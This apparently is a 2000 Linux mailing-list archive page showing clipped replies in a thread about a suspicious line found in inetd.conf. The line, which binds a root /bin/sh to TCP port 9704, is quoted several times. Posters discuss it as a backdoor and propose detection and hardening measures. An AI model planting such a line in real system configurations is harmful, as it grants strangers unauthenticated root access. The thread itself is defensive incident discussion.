Re: highly suspicious line in inetd.conf

2000-09-12 Thread Hal Burgiss
On Tue, Sep 12, 2000 at 12:00:58PM -0400, rpjday wrote:
> On Tue, 12 Sep 2000, Hal Burgiss wrote:
>
> > On Tue, Sep 12, 2000 at 09:54:30AM -0500, Jonathan Wilson wrote:
> > > I was just thinking. I know there's trip wire and stuff. but it would be
> > > neat to have cron run a script, that did m

Re: highly suspicious line in inetd.conf

2000-09-12 Thread Gordon Messmer
On Mon, 11 Sep 2000, Martin Brown wrote:
> The man page for 'netstat' on my system [RH 6.1] does not mention the '-a'
> option. What does it do?

On my system, the man page says:

-a, --all
The -a, --all option will print information about all sockets, including the listeni

Re: highly suspicious line in inetd.conf

2000-09-12 Thread Chuck Mead
On Tue, 12 Sep 2000, tsombakos, mark spewed into the bitstream:

tm>Rat B*STARD!
tm>
tm>I thought I'd check out my inetd.conf too. I'd been looking
tm>at the log files daily, and I was using "snort" to
tm>watch for suspicious activity (mind you, I'm little
tm>more than a mere novice)
tm>
tm>Same

RE: highly suspicious line in inetd.conf

2000-09-12 Thread Eric Knudstrup
ary?

Eric

> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED]]On Behalf Of Hal Burgiss
> Sent: Tuesday, September 12, 2000 8:33 AM
> To: [EMAIL PROTECTED]
> Subject: Re: highly suspicious line in inetd.conf
>
>
> On Tue, Sep 12, 2000 at 09

Re: highly suspicious line in inetd.conf

2000-09-12 Thread tsombakos, mark
router that doesn't forward that port. That's my current theory :)

Mark

>
> Message: 14
> Date: Tue, 12 Sep 2000 09:54:30 -0500
> To: [EMAIL PROTECTED]
> From: [EMAIL PROTECTED] (Jonathan Wilson)
> Subject: Re: highly suspicious line in inetd.conf
> Reply-To: [E

Re: highly suspicious line in inetd.conf

2000-09-12 Thread rpjday
On Tue, 12 Sep 2000, Hal Burgiss wrote:

> On Tue, Sep 12, 2000 at 09:54:30AM -0500, Jonathan Wilson wrote:
> > I was just thinking. I know there's trip wire and stuff. but it would be
> > neat to have cron run a script, that did md5sum "checks" on various things,
> > and mailed you, if the sum

Re: highly suspicious line in inetd.conf

2000-09-12 Thread Hal Burgiss
On Tue, Sep 12, 2000 at 09:54:30AM -0500, Jonathan Wilson wrote:
> I was just thinking. I know there's trip wire and stuff. but it would be
> neat to have cron run a script, that did md5sum "checks" on various things,
> and mailed you, if the sum changed on anything that's in its list. Anyone

Re: highly suspicious line in inetd.conf

2000-09-12 Thread Charles Galpin
check freshmeat, today or yesterday, something was posted that does just that.

On Tue, 12 Sep 2000, Jonathan Wilson wrote:

> I was just thinking. I know there's trip wire and stuff. but it would be
> neat to have cron run a script, that did md5sum "checks" on various things,
> and mailed you,

Re: highly suspicious line in inetd.conf

2000-09-12 Thread Jonathan Wilson
nd you, I'm little
>more than a mere novice)
>
>Same damn line. Looks like I know what I'm doing this
>weekend and learning IPCHAINS.
>
>Thanks, all. I would probably have never thought to look
>there.
>
>Mark
>
>
>
>
>
> Message: 2> Message

Re: highly suspicious line in inetd.conf

2000-09-12 Thread tsombakos, mark
kend and learning IPCHAINS.

Thanks, all. I would probably have never thought to look there.

Mark

> > Message: 2> Message: 3
> Date: Mon, 11 Sep 2000 16:22:58 -0500
> From: "Michael R. Jinks" <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED]
> Subject: Re: highly

RE: highly suspicious line in inetd.conf

2000-09-11 Thread Chad W. Skinner
I don't know anything about hacking a box, but if this guy/gal left this gaping hole and you don't have logs saying where s/he came from I would probably set up IP chains to log all connection attempts to the box on this port. Maybe he is bright enough to log in from a static IP. ___

Re: highly suspicious line in inetd.conf

2000-09-11 Thread Martin Brown
On Mon, 11 Sep 2000, Gordon Messmer wrote:

> I suggest you :
> netstat -avnp | grep LISTEN
>

Thank you for the above piece of "code". The man page for 'netstat' on my system [RH 6.1] does not mention the '-a' option. What does it do? In my case, there are more inetd services listening than a

Re: highly suspicious line in inetd.conf

2000-09-11 Thread wYRd
>Yep, that's an unashamed hack. This is your average "I'm too stupid to
>_hide_ the back door, so I'll hope that no one looks" script kiddie
>signature.

found more info on the cert site. right off the rpc.statd vulnerability warning ( not a very creative cracker. I mean jeeze, at least change t

Re: highly suspicious line in inetd.conf

2000-09-11 Thread Gordon Messmer
On Mon, 11 Sep 2000, wYRd wrote:

> Looking over a client's system I found the following
> line in inetd.conf:
> 9704 stream tcp nowait root /bin/sh sh -i

Yep, that's an unashamed hack. This is your average "I'm too stupid to _hide_ the back door, so I'll hope that no one looks" script kiddie si

Re: highly suspicious line in inetd.conf

2000-09-11 Thread Michael R. Jinks
On Mon, Sep 11, 2000 at 02:04:37PM -0700, wYRd wrote:
>
> Looking over a client's system I found the following
> line in inetd.conf:
> 9704 stream tcp nowait root /bin/sh sh -i

EEK!

> telnet to the port and instant root access.

Yup.

> A quick look around didn't reveal any obvious
> problems.

Re: highly suspicious line in inetd.conf

2000-09-11 Thread Chuck Mead
On Mon, 11 Sep 2000, wYRd spewed into the bitstream:

w>
w>Looking over a client's system I found the following
w>line in inetd.conf:
w> 9704 stream tcp nowait root /bin/sh sh -i
w>
w>telnet to the port and instant root access.
w>
w>A quick look around didn't reveal any obvious
w>problems. I'm wor